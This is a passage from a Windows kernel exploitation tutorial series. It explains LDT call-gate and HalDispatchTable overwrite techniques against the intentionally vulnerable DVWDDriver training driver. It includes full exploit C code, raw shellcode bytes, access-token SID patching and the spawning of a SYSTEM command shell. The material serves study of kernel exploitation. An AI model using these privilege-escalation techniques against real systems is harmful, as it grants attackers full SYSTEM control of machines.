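    d |= (uint64_t)1 << 47;                   /* bit  47    : present        */
    d |= (uint64_t)(offset >> 16) << 48;      /* bits 48..63: offset 31..16  */
    return d;
}

/* Linear address reached through the gate: base of the target code
   segment plus the offset stored in the gate. */
static uint32_t gate_target(uint64_t gate, uint32_t code_segment_base)
{
    uint32_t offset = (uint32_t)(gate & 0xFFFFu)
                    | (uint32_t)((gate >> 48) << 16);
    return code_segment_base + offset;
}
```

With the values chosen above (selector 0x0008, DPL 3, type 12) and an example payload address of 0x12345678, make_call_gate() yields 0x1234EC0000085678. Since the kernel code segment is flat (base 0), gate_target() returns the payload address itself.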
        After that, we need to know how to call our Call-Gate...
        For that, we'll use the x86 instruction FAR CALL (0x9A). It differs from a classic CALL because we must specify an offset (32 bits) AND a Segment Selector (16 bits). In our case, we just need to put the right value in the Segment Selector and can leave the offset at 0x00000000 (the processor ignores it when the selector refers to a Call-Gate). Indeed, the call is done in two stages: the FAR CALL reaches the Call-Gate Descriptor, and the Call-Gate Descriptor then points to the code we want to execute. Let's see how a Segment Selector is built:
        So:
        • Bits 0,1: we call the Call-Gate from userland, so we'll put the value 11 (3 in decimal for Ring3) here;
        • Bit 2: we'll put the value 1 because we'll put our Call-Gate Descriptor into LDT;
        • Bits 3..15: this is the index into GDT/LDT (here into LDT). We'll put our Call-Gate at the first position into the LDT, so we'll put the value 0 here.
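The three bit fields listed above can be packed and unpacked with a few shifts. The helper names in this C sketch are hypothetical; the selector values used to illustrate it are the ones that appear in this post.

```c
#include <assert.h>
#include <stdint.h>

/* Build a 16-bit Segment Selector from its three fields. */
static uint16_t make_selector(unsigned index, unsigned in_ldt, unsigned rpl)
{
    assert(index < 8192 && in_ldt <= 1 && rpl <= 3);
    return (uint16_t)((index << 3) | (in_ldt << 2) | rpl);
}

/* Bits 3..15: index into the GDT or the LDT. */
static unsigned selector_index(uint16_t s)  { return s >> 3; }

/* Bit 2: 0 = descriptor in the GDT, 1 = descriptor in the LDT. */
static unsigned selector_in_ldt(uint16_t s) { return (s >> 2) & 1u; }

/* Bits 0..1: Requested Privilege Level (0 = Ring0, 3 = Ring3). */
static unsigned selector_rpl(uint16_t s)    { return s & 3u; }
```

make_selector(0, 1, 3) gives 0x0007, the selector used for our Call-Gate. Conversely, the kernel code selector 0x0008 decodes to index 1 in the GDT with RPL 0, and the FS values 0x30 and 0x3B decode to GDT entries 6 (RPL 0) and 7 (RPL 3).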

        3. Methodology of exploitation

        Now that we've got the background about GDT and LDT we can move on to the exploitation...
        Basically, the exploitation consists in creating a new LDT. Then we add a single entry to that LDT: a Call-Gate Descriptor whose fields are set as explained before...


        And then, we need to use the write-what-where vulnerability in order to overwrite the LDT descriptor in the GDT with a descriptor corresponding to the fake LDT that has been previously created. Here:
        • what = LDT descriptor of the fake LDT,
        • where = location of the LDT descriptor. The LDT is represented by a KGDTENTRY structure called LdtDescriptor, which is a field of the _KPROCESS structure (the structure used by the kernel to store information about a specific process), as we've seen before. So, we can get the address where we want to write by retrieving the address of _KPROCESS (== address of _EPROCESS) and adding the right offset to it (0x20 for Windows Server 2003 SP2).
        Finally, we can call our Call-Gate by making a FAR CALL on the first (and only) entry of the LDT of the current process. This makes it possible to jump to our shellcode.
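The "what" and the "where" can be sketched as two small computations in portable C. The bit positions follow the system-segment descriptor layout of the Intel Manual, with type 2 meaning LDT; the names make_ldt_descriptor and where_address are hypothetical, the base address in the usage note is arbitrary, and the 0x20 offset is the one read from the kd output for Windows Server 2003 SP2.

```c
#include <assert.h>
#include <stdint.h>

#define LDT_DESC_OFFSET_IN_KPROCESS 0x20u  /* _KPROCESS.LdtDescriptor, 2003 SP2 */
#define DESC_TYPE_LDT               0x2u   /* system descriptor type: LDT       */

/* "what": a present LDT descriptor for a table at 'base' of size 'limit'. */
static uint64_t make_ldt_descriptor(uint32_t base, uint32_t limit)
{
    uint64_t d = 0;
    assert(limit <= 0xFFFFFu);
    d |= (uint64_t)(limit & 0xFFFFu);              /* bits  0..15: limit 15..0  */
    d |= (uint64_t)(base & 0xFFFFu) << 16;         /* bits 16..31: base 15..0   */
    d |= (uint64_t)((base >> 16) & 0xFFu) << 32;   /* bits 32..39: base 23..16  */
    d |= (uint64_t)DESC_TYPE_LDT << 40;            /* bits 40..43: type         */
    d |= (uint64_t)1 << 47;                        /* bit  47    : present      */
    d |= (uint64_t)((limit >> 16) & 0xFu) << 48;   /* bits 48..51: limit 19..16 */
    d |= (uint64_t)(base >> 24) << 56;             /* bits 56..63: base 31..24  */
    return d;
}

/* "where": address of the LdtDescriptor field of the current _KPROCESS. */
static uint32_t where_address(uint32_t kprocess)
{
    return kprocess + LDT_DESC_OFFSET_IN_KPROCESS;
}
```

For a fake LDT at the example address 0x12345678 with a limit of 0xFFFF, the 8 bytes to write are 0x120082345678FFFF, and for a _KPROCESS located at 0x808970c0 they have to be written at 0x808970e0.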

        4. Shellcoding

        Okay, we've briefly seen how the exploitation works. We will re-use the shellcode from the previous article about exploiting write-what-where vulnerabilities with HalDispatchTable. But there is an additional problem here: we need to be able to return from the Call-Gate after the execution of our payload. Since a FAR CALL is made to reach the Call-Gate, the code segment changes, so we need to return with a FAR RET (0xCB) and not a simple RET. By doing so, execution resumes at the next instruction of our exploit program.

        Moreover, it's important to remember that the FS segment register points to the KPCR structure (Kernel Processor Control Region) in kernel-mode, whereas in user-mode it points to the TEB structure (Thread Environment Block). Indeed:
        • In Kernel-Mode, FS=0x30
        • In User-Mode, FS=0x3B
        Therefore, we have to correctly set FS to the value 0x30 before executing our shellcode in kernelland, and then we must put its value back to 0x3B before returning.

        It is for these two reasons that the authors of the DVWDExploit have written a wrapper (ReturnFromGate) in ASM that performs those operations. It is the address of this wrapper that must be put into the Offset field of the Call-Gate Descriptor.

        5. Exploitation in details

        Okay, we've got all the elements to fully understand the exploit. Here is how it works:
        1. Retrieve the address of the payload that will be executed in Kernel-mode (named KernelPayload), that's to say the code to patch the current process' Access Token.
        2. Retrieve the address of the _KPROCESS structure.
        3. Retrieve the address of the LDT descriptor into the GDT, located at address of _KPROCESS + offset (0x20)
        4. Create a new LDT using the ZwSetInformationProcess() syscall within ntdll.dll. This is done in the function called SetLDTEnv().
        5. Put the address KernelPayload into the wrapper ReturnFromGate to be able to call the shellcode from it. Then, put this wrapper into executable memory.
        6. Build the Call-Gate Descriptor in the function called PrepareCallGate32(). Well, we've already seen how to correctly fill the fields of the Call-Gate in order to be able to run code in Ring0 from Ring3.
        7. Build the LDT Descriptor that corresponds to the previously created LDT. This is done by the function called PrepareLDTDescriptor32()
        8. Overwrite the LDT descriptor into the GDT by the one corresponding to the fake LDT that has been previously created, by using the vulnerability:
          • Store the new LDT descriptor into the GlobalOverwriteStruct thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_STORE.
          • Write this new LDT descriptor - contained into GlobalOverwriteStruct - at the location of the existing LDT descriptor into GDT, thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_OVERWRITE.
        9. Then, we need to force a process context switch. Indeed, the LDT Segment Descriptor into the GDT is updated only after a context switch. To do so, we just sleep for some time.
        10. Finally, we make our FAR CALL to the Call-Gate. That will trigger the execution of the wrapper and then of our shellcode in kernel-mode.
        11. When we return from our shellcode, the process is running with Owner SID = NT AUTHORITY\SYSTEM, so we can do what we want ! 
        A figure might help to understand... =) 




        6. Exploit code

        Here is a code snippet from DVWDExploit with many comments I've added. The full code is available in the archive:

        // ----------------------------------------------------------------------------
        // Arbitrary Memory Overwrite exploitation ------------------------------------
        // ---- Method using LDT  -----------------------------------------------------
        // ----------------------------------------------------------------------------
        
        
        typedef NTSTATUS (WINAPI *_ZwSetInformationProcess)(HANDLE ProcessHandle, 
                               PROCESS_INFORMATION_CLASS ProcessInformationClass,  
                               PPROCESS_LDT_INFORMATION ProcessInformation,
                               ULONG ProcessInformationLength);    
        
        // Fill the Call-Gate Descriptor -------------------------------------------------
        VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload) {
        
         ULONG_PTR IPayload = (ULONG_PTR)Payload;
        
         RtlZeroMemory(pGate, sizeof(CALL_GATE32));
         
         pGate->Fields.OffsetHigh   = (IPayload & 0xFFFF0000) >> 16;
         pGate->Fields.OffsetLow    = (IPayload & 0x0000FFFF);
         pGate->Fields.Type     = 12;   // Gate Descriptor
         pGate->Fields.Param    = 0;
         pGate->Fields.Present    = 1;
         pGate->Fields.SegmentSelector  = 1 << 3;  // Kernel Code Segment Selector
         pGate->Fields.Dpl     = 3;
        }
        
        // Setup the LDT descriptor ------------------------------------------------------
        VOID PrepareLDTDescriptor32(PLDT_ENTRY pLDTDesc, PVOID LDTBasePtr) {
        
         ULONG_PTR LDTBase = (ULONG_PTR)LDTBasePtr;
        
         RtlZeroMemory(pLDTDesc, sizeof(LDT_ENTRY));
         
         pLDTDesc->BaseLow     = LDTBase & 0x0000FFFF;
         pLDTDesc->LimitLow     = 0xFFFF;
         pLDTDesc->HighWord.Bits.BaseHi  = (LDTBase & 0xFF000000) >> 24;
         pLDTDesc->HighWord.Bits.BaseMid = (LDTBase & 0x00FF0000) >> 16;
         pLDTDesc->HighWord.Bits.Type = 2;
         pLDTDesc->HighWord.Bits.Pres  = 1;
        }
        
        
        // Assembly wrapper to the payload to be able to return from the Call-Gate ------
        // (using a FAR RET)
        #define OFFSET_SHELLCODE 18
        CHAR ReturnFromGate[]="\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x60"                  // pushad       save general purpose registers
               "\x0F\xA0"              // push  fs     save FS segment register
               "\x66\xB8\x30\x00"      // mov  ax, 30h   
               // FS value is different between userland (0x3B) and kernelland (0x30)
               "\x8E\xE0"              // mov  fs, ax     
               "\xB8\x41\x41\x41\x41"  // mov  eax, @Shellcode  invoke the payload
               "\xFF\xD0"              // call  eax  
               "\x0F\xA1"              // pop   fs     restore FS segment register
               "\x61"                  // popad        restore general purpose registers
               "\xcb";                 // retf         far ret
        
               
        // Assembly code that executes a CALL to 0007:00000000 ----------------------------
        // (Segment selector: 0x0007, offset address: 0x00000000)
        // 16-bit segment selector:
        // [ 13-bit index into GDT/LDT ][0=descriptor in GDT/1=descriptor in LDT]
        // [Requested Privilege Level: 00=ring0/11=ring3]
        // => 0007 means: index 0 (first entry), descriptor in LDT, ring3
        VOID FarCall() {
         __asm { 
           _emit 0x9A
           _emit 0x00
           _emit 0x00
           _emit 0x00
           _emit 0x00
           _emit 0x07
           _emit 0x00
         }
        }
        
        // Use the vulnerability to overwrite the LDT Descriptor into GDT ------------------
        BOOL OverwriteGDTEntry(ULONG64 LDTDesc, PVOID *KGDTEntry) {
        
         HANDLE hFile;
         ARBITRARY_OVERWRITE_STRUCT overwrite;
         ULONG64 storage = LDTDesc;
         BOOL ret;
         DWORD dwReturn;
        
         hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
        
         if(hFile != INVALID_HANDLE_VALUE) {
          overwrite.Size = 8;
          overwrite.StorePtr = (PVOID)&storage;
          ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
        
          overwrite.Size = 8;
          overwrite.StorePtr = (PVOID)KGDTEntry;
          ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
        
          CloseHandle(hFile);
        
          return TRUE;
         }
        
         return FALSE;
        }
        
        
        // Create a new LDT using ZwSetInformationProcess ----------------------------------
        BOOL SetLDTEnv(VOID) {
        
         NTSTATUS retStatus;
         LDT_ENTRY eLdt;
         PROCESS_LDT_INFORMATION infoLdt; 
         _ZwSetInformationProcess ZwSetInformationProcess;
        
         // Retrieve the address of the undocumented syscall ZwSetInformationProcess()
         ZwSetInformationProcess = (_ZwSetInformationProcess)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwSetInformationProcess");
        
         if(!ZwSetInformationProcess)
          return FALSE;
        
         // Create and initialize a new LDT
         RtlZeroMemory(&eLdt, sizeof(LDT_ENTRY));
        
         RtlCopyMemory(&(infoLdt.LdtEntries[0]), &eLdt, sizeof(LDT_ENTRY));
         infoLdt.Start = 0;
         infoLdt.Length = sizeof(LDT_ENTRY);
        
         retStatus = ZwSetInformationProcess(GetCurrentProcess(), 
                     ProcessLdtInformation, 
                     &infoLdt, 
                     sizeof(PROCESS_LDT_INFORMATION));
        
         if(retStatus != STATUS_SUCCESS)
          return FALSE;
        
         return TRUE;
        }
        
        
        #define LDT_DESC_FROM_KPROCESS 0x20
        ULONG64 LDTDescStorage32=0;
        
        // Main function -------------------------------------------------------------------
        BOOL LDTDescOverwrite32(VOID) {
        
         PVOID kprocess,kprocessLDTDesc;
         PLDT_ENTRY pLDTDesc = (PLDT_ENTRY)&LDTDescStorage32;
         PVOID ReturnFromGateArea = NULL;
         PCALL_GATE32 pGate = NULL;
        
         // Use the standard SID list patch as kernel payload
         FARPROC KernelPayload = (FARPROC)UserShellcodeSIDListPatchCallGate;
        
         // Retrieve the KPROCESS Address == EPROCESS Address
         kprocess = FindCurrentEPROCESS();
         if(!kprocess)
          return FALSE;
        
         // Address of LDT Descriptor
         // kd> dt nt!_kprocess
         kprocessLDTDesc = (PBYTE)kprocess + LDT_DESC_FROM_KPROCESS;
         printf("[--] kprocessLDTDesc found at: %p\n", kprocessLDTDesc);
        
         // Create a new LDT entry
         if(!SetLDTEnv())
          return FALSE;
        
         // Fixup the Gate Payload (replace 0x41414141 by the address of the kernel payload)
         // and put it into executable memory
         RtlCopyMemory(ReturnFromGate + OFFSET_SHELLCODE, &KernelPayload, sizeof(FARPROC));
         ReturnFromGateArea = CreateUspaceExecMapping(1);
         RtlCopyMemory(ReturnFromGateArea, ReturnFromGate, sizeof(ReturnFromGate));
        
         // Build the Call-Gate(system descriptor), we pass the address of the shellcode
         pGate = CreateUspaceMapping(1);
         PrepareCallGate32(pGate, (PVOID)ReturnFromGateArea);
        
         // Build the fake LDT Descriptor with a Call-Gate (the one previously created) 
         PrepareLDTDescriptor32(pLDTDesc, (PVOID)pGate);
        
         printf("[--] LDT Descriptor fake: 0x%llx\n", LDTDescStorage32);
        
         // Trigger the vulnerability: overwrite the LdtDescriptor field in KPROCESS
         OverwriteGDTEntry(LDTDescStorage32, kprocessLDTDesc);
         
         // Force a process context switch: the LDT segment descriptor in the GDT is
         // only updated on a context switch, so this is needed before the Call-Gate
         // can be used
         Sleep(1000);
        
         // Trigger the call gate via a FAR CALL (see assembly code)
         FarCall();
        
         return TRUE;
        }
        
        
        // This is where we begin ... ------------------------------------------------
        BOOL TriggerOverwrite32_LDTRemappingWay() {
         
         // Load the Kernel Executive ntoskrnl.exe in userland and get the kernel addresses of some symbols
         if(LoadAndGetKernelBase() == FALSE)
          return FALSE;
        
         // We exploit the vulnerability with a payload that patches the SID list to get 
         // SYSTEM privilege and then we spawn a shell if it succeeds
         if(LDTDescOverwrite32() != TRUE)
          return FALSE;
        
         if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
          wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
          return FALSE;
         }
         
         return TRUE;
        }
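
The two bit layouts this exploit relies on (the far-call selector 0x0007 and the call gate placed in the fake LDT) can be sketched in plain, portable C. This is only an illustration of the Intel descriptor format: `decode_selector` and `encode_call_gate32` are hypothetical helpers, not the `PrepareCallGate32()` used above, and the target selector 0x0008 used in the usage note is an assumption (the ring 0 code segment on 32-bit Windows).

```c
#include <assert.h>
#include <stdint.h>

/* Fields of a 16-bit x86 segment selector. */
typedef struct {
    uint16_t index;   /* bits 15..3: index into the descriptor table */
    uint8_t  in_ldt;  /* bit 2 (TI): 0 = GDT, 1 = LDT */
    uint8_t  rpl;     /* bits 1..0: Requested Privilege Level */
} selector_fields;

selector_fields decode_selector(uint16_t sel) {
    selector_fields f;
    f.index  = (uint16_t)(sel >> 3);
    f.in_ldt = (uint8_t)((sel >> 2) & 1);
    f.rpl    = (uint8_t)(sel & 3);
    return f;
}

/* Encode a 32-bit call gate descriptor as a 64-bit value (hypothetical helper).
 * target_sel: code segment selector the gate transfers control to
 * offset:     32-bit entry point inside that segment
 * dpl:        least privileged ring allowed to use the gate (3 = ring 3)
 * params:     number of dwords copied to the new stack (0..31) */
uint64_t encode_call_gate32(uint16_t target_sel, uint32_t offset,
                            unsigned dpl, unsigned params) {
    uint32_t low, high;
    assert(dpl <= 3 && params <= 31);
    low  = ((uint32_t)target_sel << 16) | (offset & 0xFFFFu);
    high = (offset & 0xFFFF0000u)
         | (1u << 15)              /* P: descriptor present */
         | ((uint32_t)dpl << 13)   /* DPL */
         | (0xCu << 8)             /* type 0xC = 32-bit call gate, S = 0 */
         | params;
    return ((uint64_t)high << 32) | low;
}
```

For example, `decode_selector(0x0007)` yields index 0, `in_ldt` 1 and `rpl` 3, which matches the comment above `FarCall()`. A gate built with `encode_call_gate32(0x0008, addr, 3, 0)` has an access byte of 0xEC: present, DPL 3, type 0xC.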
        


        7. w00t ?


        The exploit is working well as we can see:

        w00t again !!


        References

        [1] GDT and LDT in Windows kernel vulnerability exploitation, by Matthew "j00ru" Jurczyk & Gynvael Coldwind, Hispasec (16 January 2010)

        [2] Intel Manual Vol. 3A & 3B
        http://www.intel.com/products/processor/manuals/

        [3] Task State Segment (TSS)

        Windows Kernel Exploitation Basics - Part 2 : Arbitrary Memory Overwrite exploitation using HalDispatchTable



        In this article, we will see a method to exploit the write-what-where vulnerability (Arbitrary Memory Overwrite) present in the DVWDDriver. This method consists in overwriting a pointer in a kernel dispatch table. Such tables are used by the kernel to store various pointers. Examples of such tables:
        • The SSDT (System Service Descriptor Table) nt!KeServiceDescriptorTable stores the addresses of syscalls; it is used by the kernel to dispatch syscalls (more information in [1]).
        • The HAL Dispatch Table nt!HalDispatchTable. The HAL (Hardware Abstraction Layer) isolates the OS from the hardware. Basically, it allows the same OS to run on machines with different hardware. This table stores pointers to routines used by the HAL.
        Here, we will overwrite a specific pointer in the HalDispatchTable. Let's see why and how... =) The main reference for everything that is summed up here is the paper [2].

        1. NtQueryIntervalProfile() and HalDispatchTable

        According to [3], NtQueryIntervalProfile() is an undocumented system call exported by ntdll.dll that retrieves the currently set delay between performance counter ticks. It calls the KeQueryIntervalProfile() function of the kernel executive ntoskrnl.exe. If we disassemble that function, we can see the following:



        So, a call is made to the routine whose address is stored at nt!HalDispatchTable+0x4 (see the red box). Therefore, if we overwrite the pointer at that address (that is to say, the second pointer in the HalDispatchTable) with the address of our shellcode, and then call the function NtQueryIntervalProfile(), our shellcode will be executed!


        2. Methodology of exploitation

        Note: GlobalOverwriteStruct is the global structure used by the driver for storing a buffer and its size.

        In order to exploit the Arbitrary Memory Overwrite vulnerability, the basic idea is to:
        1. Use the DVWDDriver's IOCTL DEVICEIO_DVWD_STORE to store the address of our shellcode into the buffer of the GlobalOverwriteStruct structure, which lives in kernelland. Remember that the address we pass as a parameter must be in the user address space (i.e. address <= 0x7FFFFFFF) because the IOCTL handler checks it with ProbeForRead(). No problem: we just pass a pointer to a variable holding the address of our shellcode (this pointer, of course, points to userland). So, the struct we pass to the driver contains this pointer and the value 4 for the size of the buffer.
        2. Then, use the DVWDDriver's IOCTL DEVICEIO_DVWD_OVERWRITE to write the content of the buffer of GlobalOverwriteStruct (that is to say, the previously stored address of the shellcode) to the address passed as a parameter. This time, there is no check in the IOCTL handler, so this address can be anywhere, in userland or in kernelland. Therefore, we pass the address of the second entry in the HalDispatchTable, which is of course in kernelland.
        So to sum up, we abuse the IOCTL DEVICEIO_DVWD_OVERWRITE in order to write what we want, where we want:
        • what = address of our shellcode,
        • where = address of nt!HalDispatchTable+0x4
        It's important to understand that both components must be controlled in order to exploit that kind of vulnerability.
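
The store-then-overwrite sequence can be modelled entirely in userland to make the "what" and "where" roles concrete. The sketch below is a simulation only: `mock_store`, `mock_overwrite` and `mock_dispatch_table` are made-up names standing in for the two IOCTL handlers and for a dispatch table, and no driver or kernel memory is involved.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Mock of the driver's global structure: a kernel-side buffer and its size. */
static struct {
    unsigned char buffer[16];
    size_t size;
} mock_global_overwrite;

/* Mock STORE: copy `size` bytes from a caller-supplied pointer into the
 * driver's buffer (the real handler also probes the source pointer). */
int mock_store(const void *src, size_t size) {
    if (size > sizeof mock_global_overwrite.buffer)
        return 0;
    memcpy(mock_global_overwrite.buffer, src, size);
    mock_global_overwrite.size = size;
    return 1;
}

/* Mock OVERWRITE: copy the stored bytes to a destination that is never
 * validated. The missing check is what makes this a write-what-where. */
void mock_overwrite(void *dst) {
    memcpy(dst, mock_global_overwrite.buffer, mock_global_overwrite.size);
}

/* Stand-in for a dispatch table: an array of function pointers. */
typedef int (*routine_t)(void);
int original_routine(void) { return 0; }
int payload_routine(void)  { return 1337; }
routine_t mock_dispatch_table[4] = {
    original_routine, original_routine, original_routine, original_routine
};

/* "what" = address of the payload, "where" = address of the second entry. */
int run_demo(void) {
    routine_t what = payload_routine;
    routine_t *where = &mock_dispatch_table[1];
    if (!mock_store(&what, sizeof what))
        return -1;
    mock_overwrite(where);
    return mock_dispatch_table[1]();   /* the hijacked indirect call */
}
```

Calling `run_demo()` returns 1337, the value produced by the payload, while the other entries of the table still point to `original_routine`.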

        NB: Here, we can overwrite the whole address (4 bytes), but we can imagine a case where we can only overwrite 1 byte. In such a scenario, we would overwrite the MSB (Most Significant Byte) of the second entry of HalDispatchTable with a value that moves the address into userland (< 0x80000000): for example, 0x01. Then, we need to put a large NOP sled in the address range 0x01000000-0x02000000 (memory marked as RWX) with a jump to our shellcode at the end.
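
The arithmetic behind this one-byte variant can be checked with a few lines of C. This is a sketch on plain 32-bit integers; `patch_msb` and `is_user_address` are hypothetical helper names, and 0x806F1234 in the usage note is an arbitrary made-up kernel pointer, not a real HalDispatchTable entry.

```c
#include <assert.h>
#include <stdint.h>

#define USER_SPACE_LIMIT 0x7FFFFFFFu

/* 32-bit Windows (default 2 GB split): user addresses are <= 0x7FFFFFFF. */
int is_user_address(uint32_t addr) {
    return addr <= USER_SPACE_LIMIT;
}

/* Replace only the most significant byte of a 32-bit pointer. On
 * little-endian x86 this byte is stored at offset +3 from the pointer's
 * address, so that is where the single-byte write would land. */
uint32_t patch_msb(uint32_t pointer, uint8_t new_msb) {
    return (pointer & 0x00FFFFFFu) | ((uint32_t)new_msb << 24);
}
```

With 0x01 as the new byte, `patch_msb(0x806F1234, 0x01)` gives 0x016F1234. Since the three low bytes are unknown in advance, the result can fall anywhere from 0x01000000 to 0x01FFFFFF, which is why the whole range has to be covered by the NOP sled.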

        Hey... wait ! I have to talk about the shellcode we use...


        3. Shellcoding... patch my Access Token and go back to Ring 3
         
        Unlike the exploitation of userland software, here our shellcode is executed in kernelland, so we cannot afford any mistake or we will get a BSOD in our face. Typically, in local kernel exploitation, we use the full privileges we have in Ring 0 to patch the Access Token of the current process and replace the User SID of the process with the SID of NT AUTHORITY\SYSTEM. Then, we go back to Ring 3 as quickly as possible, where we can do what we want, such as spawning a shell.

        In Windows, the Access Token (or just Token) describes the security context of a process or a thread. In particular, it stores the User SID, a list of Group SIDs and a list of Privileges. Based on this information, the kernel is able to decide whether an action requested by the process is authorized or not (access control). In user space, it's possible to get a handle on a Token. More information about Tokens is given in [4].
        Here is the detail of the structure _TOKEN used for describing an Access Token:

        kd> dt nt!_token
           +0x000 TokenSource      : _TOKEN_SOURCE
           +0x010 TokenId          : _LUID
           +0x018 AuthenticationId : _LUID
           +0x020 ParentTokenId    : _LUID
           +0x028 ExpirationTime   : _LARGE_INTEGER
           +0x030 TokenLock        : Ptr32 _ERESOURCE
           +0x038 AuditPolicy      : _SEP_AUDIT_POLICY
           +0x040 ModifiedId       : _LUID
           +0x048 SessionId        : Uint4B
           +0x04c UserAndGroupCount : Uint4B
           +0x050 RestrictedSidCount : Uint4B
           +0x054 PrivilegeCount   : Uint4B
           +0x058 VariableLength   : Uint4B
           +0x05c DynamicCharged   : Uint4B
           +0x060 DynamicAvailable : Uint4B
           +0x064 DefaultOwnerIndex : Uint4B
           +0x068 UserAndGroups    : Ptr32 _SID_AND_ATTRIBUTES
           +0x06c RestrictedSids   : Ptr32 _SID_AND_ATTRIBUTES
           +0x070 PrimaryGroup     : Ptr32 Void
           +0x074 Privileges       : Ptr32 _LUID_AND_ATTRIBUTES
           +0x078 DynamicPart      : Ptr32 Uint4B
           +0x07c DefaultDacl      : Ptr32 _ACL
           +0x080 TokenType        : _TOKEN_TYPE
           +0x084 ImpersonationLevel : _SECURITY_IMPERSONATION_LEVEL
           +0x088 TokenFlags       : UChar
           +0x089 TokenInUse       : UChar
           +0x08c ProxyData        : Ptr32 _SECURITY_TOKEN_PROXY_DATA
           +0x090 AuditData        : Ptr32 _SECURITY_TOKEN_AUDIT_DATA
           +0x094 LogonSession     : Ptr32 _SEP_LOGON_SESSION_REFERENCES
           +0x098 OriginatingLogonSession : _LUID
           +0x0a0 VariablePart     : Uint4B

        The list of pointers to SIDs is stored in the field UserAndGroups (a pointer to _SID_AND_ATTRIBUTES entries). We can retrieve the information contained in a Token for a given process with kd, as follows (example with the "System" process):

        kd> !process 0004
        Searching for Process with Cid == 4
        Cid handle table at e1ed7000 with 428 entries in use
        
        PROCESS 827a6648  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
            DirBase: 00587000  ObjectTable: e1000c60  HandleCount: 388.
            Image: System
            VadRoot 82337238 Vads 4 Clone 0 Private 3. Modified 5664. Locked 0.
            DeviceMap e1001070
            Token                             e1001720
            ElapsedTime                       00:37:34.750
            UserTime                          00:00:00.000
            KernelTime                        00:00:01.578
            QuotaPoolUsage[PagedPool]         0
            QuotaPoolUsage[NonPagedPool]      0
            Working Set Sizes (now,min,max)  (43, 0, 345) (172KB, 0KB, 1380KB)
            PeakWorkingSetSize                526
            VirtualSize                       1 Mb
            PeakVirtualSize                   2 Mb
            PageFaultCount                    4829
            MemoryPriority                    BACKGROUND
            BasePriority                      8
            CommitCharge                      8
        
        
        kd> !token e1001720
        _TOKEN e1001720
        TS Session ID: 0
        User: S-1-5-18
        Groups:
         00 S-1-5-32-544
            Attributes - Default Enabled Owner
         01 S-1-1-0
            Attributes - Mandatory Default Enabled
         02 S-1-5-11
            Attributes - Mandatory Default Enabled
        Primary Group: S-1-5-18
        Privs:
         00 0x000000007 SeTcbPrivilege                    Attributes - Enabled Default
         01 0x000000002 SeCreateTokenPrivilege            Attributes -
         02 0x000000009 SeTakeOwnershipPrivilege          Attributes -
        [...]

        Well, the idea is actually to replace the pointer to the process owner's SID with a pointer to the built-in NT AUTHORITY\SYSTEM SID (S-1-5-18). We also replace the group BUILTIN\Users SID (S-1-5-32-545) with the group BUILTIN\Administrators SID (S-1-5-32-544).
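
The effect of this patch can be illustrated with a userland mock. This is not the code of Shellcode32.c: the `mock_*` types are simplified stand-ins for `_TOKEN` and `_SID_AND_ATTRIBUTES`, SIDs are represented as strings only for readability, the sample user SID is made up, and the sketch assumes that entry 0 of UserAndGroups holds the user SID while the following entries hold the groups.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Simplified stand-in for _SID_AND_ATTRIBUTES. */
typedef struct {
    const char *sid;        /* real tokens store a pointer to a binary SID */
    unsigned    attributes;
} mock_sid_and_attributes;

/* Simplified stand-in for the two _TOKEN fields used by the patch. */
typedef struct {
    unsigned                 user_and_group_count;
    mock_sid_and_attributes *user_and_groups;  /* [0] = user, rest = groups */
} mock_token;

static const char SID_SYSTEM[] = "S-1-5-18";
static const char SID_USERS[]  = "S-1-5-32-545";
static const char SID_ADMINS[] = "S-1-5-32-544";

/* Point the user entry at the SYSTEM SID and turn every BUILTIN\Users group
 * entry into BUILTIN\Administrators. Returns the number of entries changed. */
int mock_patch_token(mock_token *token) {
    unsigned i;
    int patched = 0;
    if (token->user_and_group_count == 0)
        return 0;
    token->user_and_groups[0].sid = SID_SYSTEM;
    patched++;
    for (i = 1; i < token->user_and_group_count; i++) {
        if (strcmp(token->user_and_groups[i].sid, SID_USERS) == 0) {
            token->user_and_groups[i].sid = SID_ADMINS;
            patched++;
        }
    }
    return patched;
}

/* Sample token of an unprivileged user (made-up user SID). */
mock_sid_and_attributes sample_entries[3] = {
    { "S-1-5-21-1-2-3-1003", 0 },
    { "S-1-5-32-545",        7 },
    { "S-1-1-0",             7 }
};
mock_token sample_token = { 3, sample_entries };
```

Running `mock_patch_token(&sample_token)` changes two entries: the user becomes S-1-5-18 and the Users group becomes S-1-5-32-544, while the Everyone group (S-1-1-0) is left untouched.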

        The source code is in the file Shellcode32.c. It's taken from DVWDDriver; I've just added many comments to make it easier to understand.


        4. To sum up...
         
        Here is what we need to do in the exploit:
        1. Load the kernel executive ntoskrnl.exe in userland in order to get the offset of HalDispatchTable and then deduce its address in kernelland.
        2. Retrieve the address of our shellcode. This is actually the address of the function that patches the Access Token. But there is a tricky point to notice: the pointer that we overwrite in HalDispatchTable normally points to a function which takes 4 arguments (4 values are pushed on the stack before call dword ptr [nt!HalDispatchTable+0x4]). Therefore, we use a shellcode function with 4 arguments, for compatibility reasons.
        3. Retrieve the address of the syscall NtQueryIntervalProfile() within ntdll.dll.
        4. Overwrite the pointer at nt!HalDispatchTable+0x4 with the address of our shellcode function (the one with 4 arguments that patches the process' Token). This is done by calling DeviceIoControl() twice in a row to send 2 IOCTLs: DEVICEIO_DVWD_STORE and then DEVICEIO_DVWD_OVERWRITE, as explained in paragraph 2.
        5. Call the function NtQueryIntervalProfile() in order to launch the shellcode.
        6. At this point, the process is running under the System account, so we're done: we can spawn a shell, for example, or do whatever else we want!
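
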